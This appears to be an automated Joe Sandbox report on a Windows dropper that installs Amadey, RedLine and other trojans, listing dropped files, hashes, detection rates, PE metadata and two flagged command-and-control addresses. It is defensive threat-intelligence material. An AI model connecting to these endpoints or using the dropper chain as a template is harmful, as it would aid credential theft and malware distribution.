C:\Users\user\AppData\Local\Temp\IXP001.TMP\kino6423.exe	64%	ReversingLabs	Win32.Trojan.Plugx
C:\Users\user\AppData\Local\Temp\IXP002.TMP\dNT35s70.exe	44%	ReversingLabs	Win32.Trojan.CrypterX
C:\Users\user\AppData\Local\Temp\IXP002.TMP\kino4801.exe	59%	ReversingLabs	Win32.Trojan.Plugx
C:\Users\user\AppData\Local\Temp\IXP003.TMP\bus7600.exe	88%	ReversingLabs	ByteCode-MSIL.Trojan.Casdet
C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1165.exe	67%	ReversingLabs	Win32.Trojan.Babar

Unpacked PE Files

Source	Detection	Scanner	Label	Download
1.2.kino5628.exe.8e0000.0.unpack	100%	Avira	HEUR/AGEN.1252166	Download File
0.2.SzznpUhIjo.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1252166	Download File
1.0.kino5628.exe.8e0000.0.unpack	100%	Avira	HEUR/AGEN.1252166	Download File

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
31.41.244.200/games/category/index.php	0%	URL Reputation	safe
https://api.ip.sb/ip	0%	URL Reputation	safe
193.233.20.30:4125	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

⊘No contacted domains info

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
31.41.244.200/games/category/index.php	true	URL Reputation: safe	low
193.233.20.30:4125	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://api.ip.sb/ip	kino5628.exe, 00000001.00000003.256675819.00000000046C5000.00000004.00000020.00020000.00000000.sdmp, en239906.exe.1.dr	false	URL Reputation: safe	unknown

World Map of Contacted IPs

⊘No contacted IP infos

General Information

Joe Sandbox Version:	37.0.0 Beryl
Analysis ID:	829685
Start date and time:	2023-03-18 21:05:04 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 11m 16s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	22
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample file name:	SzznpUhIjo.exe
Original Sample Name:	f62fe8447c5e9b9ea5ac424543ad20b3.exe
Detection:	MAL
Classification:	mal93.troj.spyw.evad.winEXE@15/10@0/0
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 54.2% (good quality ratio 52%) Quality average: 85.2% Quality standard deviation: 23.7%
HCA Information:	Successful, ratio: 100% Number of executed functions: 137 Number of non-executed functions: 164
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240s for rundll32

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
Excluded domains from analysis (whitelisted): fs.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtProtectVirtualMemory calls found.

Simulations

Behavior and APIs

⊘No simulations

Joe Sandbox View / Context

IPs

⊘No context

Domains

⊘No context

ASNs

⊘No context

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\IXP000.TMP\ge280443.exe	szDGo5lHdI.exe	Get hash	malicious	Amadey, RedLine	Browse
	bCHMhfe2vn.exe	Get hash	malicious	Amadey, RedLine	Browse
	JWwmlPG6T4.exe	Get hash	malicious	Amadey, RedLine	Browse
	lz1sDblrYC.exe	Get hash	malicious	Amadey, RedLine	Browse
	2OFtBU6Tvq.exe	Get hash	malicious	Amadey, RedLine	Browse
	tb5QNVq4tA.exe	Get hash	malicious	Amadey, RedLine	Browse
	wD1HavDmzM.exe	Get hash	malicious	Amadey, RedLine	Browse
	d1CNSOQG6J.exe	Get hash	malicious	Amadey, RedLine	Browse
	amXdEMvtjh.exe	Get hash	malicious	Amadey, RedLine	Browse
	qRIHmQVYic.exe	Get hash	malicious	Amadey, RedLine	Browse
	oPHmWw9Rxf.exe	Get hash	malicious	Amadey, RedLine	Browse
	geMizFBwNi.exe	Get hash	malicious	Amadey, RedLine	Browse
	setup.exe	Get hash	malicious	Amadey, RedLine	Browse
	E8DQP4nJIj.exe	Get hash	malicious	Amadey, RedLine	Browse
	r0cTE8cVSm.exe	Get hash	malicious	Amadey, RedLine	Browse
	xj1TpEtv4z.exe	Get hash	malicious	Amadey, RedLine	Browse
	FmgrIPCiXX.exe	Get hash	malicious	Amadey, RedLine	Browse
	yTiVDw9gIM.exe	Get hash	malicious	Amadey, RedLine	Browse
	no5jA7VYxT.exe	Get hash	malicious	Amadey, RedLine	Browse
	WqPen4qUki.exe	Get hash	malicious	Amadey, RedLine	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\bus7600.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\IXP003.TMP\bus7600.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	226
Entropy (8bit):	5.354940450065058
Encrypted:	false
SSDEEP:	6:Q3La/xw5DLIP12MUAvvR+uTL2wlAsDZiIv:Q3La/KDLI4MWuPTxAIv
MD5:	B10E37251C5B495643F331DB2EEC3394
SHA1:	25A5FFE4C2554C2B9A7C2794C9FE215998871193
SHA-256:	8A6B926C70F8DCFD915D68F167A1243B9DF7B9F642304F570CE584832D12102D
SHA-512:	296BC182515900934AA96E996FC48B565B7857801A07FEFA0D3D1E0C165981B266B084E344DB5B53041D1171F9C6708B4EE0D444906391C4FC073BCC23B92C37
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\con1165.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1165.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	321
Entropy (8bit):	5.355221377978991
Encrypted:	false
SSDEEP:	6:Q3La/xwchM3RJoDLIP12MUAvvR+uCqDLIP12MUAvvR+uTL2LDY3U21v:Q3La/hhkvoDLI4MWuCqDLI4MWuPk21v
MD5:	03C5BA5FCE7124B503EA65EF522177C3
SHA1:	F76B1F538D5EA66664355901E927B2F870ACCDD8
SHA-256:	8128CE419BBE0419F1A0BDE97C3A14E3377C0184DC1D7AF61AA01AAB756B625B
SHA-512:	151A974DDABA852144EC4BC18C548227A32E5261736F186A3920F2497434AEE9DBB0E0AB77E0E52A84A9FBC4529A158882B7549763400DDC2082D384B1135141
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..

C:\Users\user\AppData\Local\Temp\IXP000.TMP\ge280443.exe

Download File

Process:	C:\Users\user\Desktop\SzznpUhIjo.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	231424
Entropy (8bit):	6.351317966279805
Encrypted:	false
SSDEEP:	6144:4rzyIG8IcCnD5A2QdY8rWpau1CYUqfhYdMBg:KmlLnD5qdY8Fu1CYUehrBg
MD5:	8627EBE3777CC777ED2A14B907162224
SHA1:	06EEED93EB3094F9D0B13AC4A6936F7088FBBDAA
SHA-256:	319B22945BEEB7424FE6DB1E9953AD5F2DC12CBBA2FE24E599C3DEDA678893BB
SHA-512:	9DE429300C95D52452CAEB80C9D44FF72714F017319E416649C2100F882C394F5AB9F3876CC68D338F4B5A3CD58337DEFFF9405BE64C87D078EDD0D86259C845
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\ge280443.exe, Author: Joe Security
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 63% Antivirus: Virustotal, Detection: 80%, Browse
Joe Sandbox View:	Filename: szDGo5lHdI.exe, Detection: malicious, Browse Filename: bCHMhfe2vn.exe, Detection: malicious, Browse Filename: JWwmlPG6T4.exe, Detection: malicious, Browse Filename: lz1sDblrYC.exe, Detection: malicious, Browse Filename: 2OFtBU6Tvq.exe, Detection: malicious, Browse Filename: tb5QNVq4tA.exe, Detection: malicious, Browse Filename: wD1HavDmzM.exe, Detection: malicious, Browse Filename: d1CNSOQG6J.exe, Detection: malicious, Browse Filename: amXdEMvtjh.exe, Detection: malicious, Browse Filename: qRIHmQVYic.exe, Detection: malicious, Browse Filename: oPHmWw9Rxf.exe, Detection: malicious, Browse Filename: geMizFBwNi.exe, Detection: malicious, Browse Filename: setup.exe, Detection: malicious, Browse Filename: E8DQP4nJIj.exe, Detection: malicious, Browse Filename: r0cTE8cVSm.exe, Detection: malicious, Browse Filename: xj1TpEtv4z.exe, Detection: malicious, Browse Filename: FmgrIPCiXX.exe, Detection: malicious, Browse Filename: yTiVDw9gIM.exe, Detection: malicious, Browse Filename: no5jA7VYxT.exe, Detection: malicious, Browse Filename: WqPen4qUki.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......]..M.o...o...o..B....o..B....o..B....o.......o.......o......5o..B....o...o...o.......o....m..o.......o..Rich.o..................PE..L...gv.d.............................V............@.......................................@..................................M..d................................'...#..p....................$.......#..@............................................text...}........................... ..`.rdata..p...........................@..@.data...H'...`.......F..............@....rsrc................^..............@..@.reloc...'.......(...`..............@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\IXP000.TMP\kino5628.exe

Download File

Process:	C:\Users\user\Desktop\SzznpUhIjo.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	870912
Entropy (8bit):	7.918235779778771
Encrypted:	false
SSDEEP:	12288:xMrny90oTgVqmNTdrA26N6DLaDYUBXaSQzuMqXlxcDtMD6Og+Clkp4NE3SNwyc:eyWLNh7baXC3eCZApgEt
MD5:	51B7FE413501DC9DD84CF1FCBB4C4BA2
SHA1:	4D55BF3929ED65E32BBD774B8C4AA112ACF211E3
SHA-256:	E7161C00B03551D7A04E547110B71BC7CBC81B0CEC26AFEC42323A0511F7F572
SHA-512:	246EFFEFC9D395F83033DD9DEE9B7C1B6D40723C1195FCCA6DFDDA1F60848A0DD6A5BA79A6E4DAB1AE2EEE059F9EF27AEBEF81304805183CAB69CC2E0BAB60C0
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 68% Antivirus: Virustotal, Detection: 65%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........%...K..K..K...N..K...H..K...O..K...J..K..J...K...C..K.....K...I..K.Rich..K.........PE..L....`.b.................d..........`j............@.......................................@...... ......................................................................T...............................@............................................text....c.......d.................. ..`.data...H............h..............@....idata..R............j..............@..@.rsrc................\|..............@..@.reloc...............@..............@..B........................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\IXP001.TMP\en239906.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\IXP000.TMP\kino5628.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	179200
Entropy (8bit):	4.951892860913068
Encrypted:	false
SSDEEP:	3072:W9xqZWBJaHEDgXGJ5MS8IL1eXx9vhxbxNn2pU9f2MKTV/wi4lr55R9TxlnsPsUw9:WHqZVGJ5bHLYvh
MD5:	6FBFF2D7C9BA7F0A71F02A5C70DF9DFC
SHA1:	003DA0075734CD2D7F201C5B0E4779B8E1F33621
SHA-256:	CB56407367A42F61993842B66BCD24993A30C87116313C26D6AF9E37BBB1B6B3
SHA-512:	25842B9DF4767B16096F2BFCEDC9D368A9696E6C6D9C7B2C75987769A5B338AE04B23B1E89F18EEF2244E84F04E4ACF6AF56643A97ABFE5B605F66CBA0BAC27F
Malicious:	true
Yara Hits:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\en239906.exe, Author: Joe Security Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\en239906.exe, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 88% Antivirus: Virustotal, Detection: 80%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....E................0.............~.... ........@.. ....................... ............@.................................,...O.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\IXP001.TMP\kino6423.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\IXP000.TMP\kino5628.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	725504
Entropy (8bit):	7.892582618323688
Encrypted:	false
SSDEEP:	12288:sMrSy90DPz6pF226NPDLPQYUBma59zh8qXlzZDZMD6ObrCrk/2/V3Sl:+yiaL0qmUuKFVu/QVw
MD5:	DB27DCB2B593E449358CEC94D3D257DA
SHA1:	9BAF8FFCA3B41D45510491BE18B3C7925D3C2BBE
SHA-256:	211AEFFAE8C6C2E01ADFA9FC68EE1383EBA739F91E2E446F0015B46A5CE3EA7E
SHA-512:	931904EF2A1707DC53914C7EB26DB142417E75461DE76E27FBA839BFDA0EEAA5FFC49B8F73D0592DC71A82D11E9B2E917FF34B53D87B709A4126B6E8A29FF1DD
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 64%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........%...K..K..K...N..K...H..K...O..K...J..K..J...K...C..K.....K...I..K.Rich..K.........PE..L....`.b.................d..........`j............@..........................`............@...... ......................................T....................P..........T...............................@............................................text....c.......d.................. ..`.data...H............h..............@....idata..R............j..............@..@.rsrc................\|..............@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\IXP002.TMP\dNT35s70.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\IXP001.TMP\kino6423.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	439808
Entropy (8bit):	6.702697953069308
Encrypted:	false
SSDEEP:	6144:UeQq/CLl3o24+WIqXjJcDwZMND6WbrhYmpCTsPrIz:N/CZ3o243TeMZMD6WbrSmUmI
MD5:	685668F97D2248E1D69DA6CC1553EC0B
SHA1:	1A034138A90ECADE47AA7FD6982CC2AE3CFF7F03
SHA-256:	AE3FAA7905D107E9209BE0EA000BA94A09752AE5DF064C86E662B2B1A75554AB
SHA-512:	DCCC56807CA396489DCC3BAA4BA5BEAD515427FAAEF074B9C4F72386D25CBBC8A4446EBCE306D470EBAAB4B31062FFF1A2564B818778B3B09CEFEDC06D9F07E5
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 44%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........B..,...,...,.......,.......,.......,..0W...,...-...,.......,.......,.......,.Rich..,.................PE..L.....a.................4...Nm......n.......P....@...........................q..............................................8..d....po.......................q.x..................................../..@............................................text....2.......4.................. ..`.data...H.k..P...B...8..............@....rsrc........po......z..............@..@.reloc........q.....................@..B........................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\IXP002.TMP\kino4801.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\IXP001.TMP\kino6423.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	351744
Entropy (8bit):	7.691266649958334
Encrypted:	false
SSDEEP:	6144:KAy+bnr+op0yN90QExDhdvfGLgfYUNcQZR0OCxH8BjFOHCFPkBVHUF+b3K5:wMrgy907DLwQYU6mROVQS8qG
MD5:	211103CF935C81941C9A7C527A99891E
SHA1:	1F57C1B0E7784F36E6123BBD9F1F750C430AB7AD
SHA-256:	F5C28886725B88C1AE31FE02A8EB8B2A7D6E72ED41D8BFB80A5C468AA41A4DDE
SHA-512:	5A4CCA86C05D356D479E9DF6A08BC98CD795234FCCD4AB15109A2316033EE7EC6D26DA04CE788E967ACEC07E32192DFE6E20A4CFA52839D6CB987A0D74328D4C
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 59%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........%...K..K..K...N..K...H..K...O..K...J..K..J...K...C..K.....K...I..K.Rich..K.........PE..L....`.b.................d..........`j............@.......................................@...... ......................................................................T...............................@............................................text....c.......d.................. ..`.data...H............h..............@....idata..R............j..............@..@.rsrc................\|..............@..@.reloc...............T..............@..B........................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\IXP003.TMP\bus7600.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\IXP002.TMP\kino4801.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	11264
Entropy (8bit):	4.97029807367379
Encrypted:	false
SSDEEP:	96:yA/vMth9sDLibql3A44P9QL4fwmPImg+A03PvXLOzk+gqWYV4J6oP/zNt:yw+wGWt94+iANiCkc4Jhp
MD5:	7E93BACBBC33E6652E147E7FE07572A0
SHA1:	421A7167DA01C8DA4DC4D5234CA3DD84E319E762
SHA-256:	850CD190AAEEBCF1505674D97F51756F325E650320EAF76785D954223A9BEE38
SHA-512:	250169D7B6FCEBFF400BE89EDAE8340F14130CED70C340BA9DA9F225F62B52B35F6645BFB510962EFB866F988688CB42392561D3E6B72194BC89D310EA43AA91
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 88%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................"...0.."...........@... ...`....@.. ....................................@..................................@..O....`...............................@..8............................................ ............... ..H............text.... ... ...".................. ..`.rsrc........`.......$..............@..@.reloc.............................@..B.................@......H.......T$...............................................................0...........@s.....@...(....&..0..K......... ?...(......~....(....,.r...p.....(....%..(....& ....(....(....&.(....&..0..e.......(....~........+G.....o....r#..p(....,-.o.... ......(....-..(....&(.....o....(....&..X....i2..(....&....0..`.......(....~........+B.....o....r...p(....,(.o.... ......(....-..(....&.o....(....&..X....i2..(....&.0..c......... ?...(......~....(....,.*....(............%...(...

C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1165.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\IXP002.TMP\kino4801.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	340992
Entropy (8bit):	6.466677658359874
Encrypted:	false
SSDEEP:	6144:sZJLa5SdfYUNcQZc0OzxE8RjF/HCFPdBMkhDHK:sZJ+5ShYU6mcn5Q/K
MD5:	3930494C030BFEF77C7C0624C1F6BAEB
SHA1:	3FFC69B116C370D6372A62E1C623EA8457808152
SHA-256:	76A3221E1DCEF4CF9B0F8856DB1E20D24D782C4BF068CF76E95A57EAA6B1516E
SHA-512:	AB2A772BC04DB434AF4D2C5CD5253A3634A9679E329AD7CE53FAFDE8E7C81CDCC53B3D00F5D2CBC47EAD6BF4EFD1A0D8BAD81FD63E452D4401E3C82A757F7910
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 67%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......@......P...P...P..(P/..P..9P...P../Pm..P#z.P...P...Py..P..&P...P..8P...P..=P...PRich...P................PE..L...=..b......................m......P............@..........................0p.................................................d.....n.......................o.....................................P-..@............................................text...h........................... ..`.data...H.j......&..................@....rsrc.........n.....................@..@.reloc..l.....o.....................@..B........................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.76751253637924
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	SzznpUhIjo.exe
File size:	1238528
MD5:	f62fe8447c5e9b9ea5ac424543ad20b3
SHA1:	847f52f9fff9b080e44de6738b61141b289cd09c
SHA256:	d7f0a894956299f235cc735af3469746f223b3394abc85660e89872503e55982
SHA512:	c003f5dba14ac90cfbfcb66c8efff3caecad59ef4938fffb4b8c9cba776bfd7363dd8e1f37174d884582e5d237f4241d404014f82617b8fcdcb77352d327a205
SSDEEP:	24576:bogX4PvpDseL3ckNcZQrKxl3fXZ16b4PEPtYn1h7Xn6iZGyF:bdoPLrcepKfBG4PEED7XF
TLSH:	5D45F14392E13C48E9268B339E1FD6E8F71EF6B1EE89676531189E2F0471172D163B90
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......@......P...P...P..(P/..P..9P...P../Pm..P#z.P...P...Py..P..&P...P..8P...P..=P...PRich...P................PE..L....Dbb...........

File Icon


Icon Hash:	a4a484a4a4a4a4e2

Static PE Info

General

Entrypoint:	0x405088
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Time Stamp:	0x62624480 [Fri Apr 22 06:00:32 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	8b512f0a0b2cd54ff600ee8ace8b2bd0

Entrypoint Preview

Instruction
call 00007F6B44C7F123h
jmp 00007F6B44C7B35Eh
mov edi, edi
push ebp
mov ebp, esp
push ecx
push esi
mov esi, dword ptr [ebp+0Ch]
push esi
call 00007F6B44C7CBE5h
mov dword ptr [ebp+0Ch], eax
mov eax, dword ptr [esi+0Ch]
pop ecx
test al, 82h
jne 00007F6B44C7B4F9h
call 00007F6B44C7C48Dh
mov dword ptr [eax], 00000009h
or dword ptr [esi+0Ch], 20h
or eax, FFFFFFFFh
jmp 00007F6B44C7B614h
test al, 40h
je 00007F6B44C7B4EFh
call 00007F6B44C7C472h
mov dword ptr [eax], 00000022h
jmp 00007F6B44C7B4C5h
push ebx
xor ebx, ebx
test al, 01h
je 00007F6B44C7B4F8h
mov dword ptr [esi+04h], ebx
test al, 10h
je 00007F6B44C7B56Dh
mov ecx, dword ptr [esi+08h]
and eax, FFFFFFFEh
mov dword ptr [esi], ecx
mov dword ptr [esi+0Ch], eax
mov eax, dword ptr [esi+0Ch]
and eax, FFFFFFEFh
or eax, 02h
mov dword ptr [esi+0Ch], eax
mov dword ptr [esi+04h], ebx
mov dword ptr [ebp-04h], ebx
test eax, 0000010Ch
jne 00007F6B44C7B50Eh
call 00007F6B44C7C76Eh
add eax, 20h
cmp esi, eax
je 00007F6B44C7B4EEh
call 00007F6B44C7C762h
add eax, 40h
cmp esi, eax
jne 00007F6B44C7B4EFh
push dword ptr [ebp+0Ch]
call 00007F6B44C7FB11h
pop ecx
test eax, eax
jne 00007F6B44C7B4E9h
push esi
call 00007F6B44C7FABDh
pop ecx
test dword ptr [esi+0Ch], 00000108h
push edi
je 00007F6B44C7B566h
mov eax, dword ptr [esi+08h]
mov edi, dword ptr [esi]
lea ecx, dword ptr [eax+01h]
mov dword ptr [esi], ecx

Rich Headers

Programming Language:

[C++] VS2008 build 21022
[ASM] VS2008 build 21022
[ C ] VS2008 build 21022
[IMP] VS2005 build 50727
[RES] VS2008 build 21022
[LNK] VS2008 build 21022

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x109740	0x64	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x27bb000	0x1a612	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x27d6000	0xa9c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x11f0	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x2d50	0x40	.text
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x1ac	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x109108	0x109200	False	0.9758442362093352	data	7.985785026742163	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x10b000	0x26af548	0x2600	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x27bb000	0x1a612	0x1a800	False	0.38334684551886794	data	4.303385034614976	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x27d6000	0x816c	0x8200	False	0.07370793269230769	data	0.9145308616917248	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x27bb8b0	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Spanish	Mexico
RT_ICON	0x27bc758	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Spanish	Mexico
RT_ICON	0x27bd000	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Spanish	Mexico
RT_ICON	0x27bf5a8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Spanish	Mexico
RT_ICON	0x27c0650	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Spanish	Mexico
RT_ICON	0x27c0ab8	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	Spanish	Mexico
RT_ICON	0x27c1960	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	Spanish	Mexico
RT_ICON	0x27c2208	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	Spanish	Mexico
RT_ICON	0x27c28d0	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	Spanish	Mexico
RT_ICON	0x27c2e38	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216	Spanish	Mexico
RT_ICON	0x27c53e0	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096	Spanish	Mexico
RT_ICON	0x27c6488	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2304	Spanish	Mexico
RT_ICON	0x27c6e10	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024	Spanish	Mexico
RT_ICON	0x27c7278	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Spanish	Mexico
RT_ICON	0x27c8120	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Spanish	Mexico
RT_ICON	0x27c89c8	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Spanish	Mexico
RT_ICON	0x27c8f30	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Spanish	Mexico
RT_ICON	0x27cb4d8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Spanish	Mexico
RT_ICON	0x27cc580	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	Spanish	Mexico
RT_ICON	0x27ccf08	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Spanish	Mexico
RT_ICON	0x27cd370	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Spanish	Mexico
RT_ICON	0x27ce218	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Spanish	Mexico
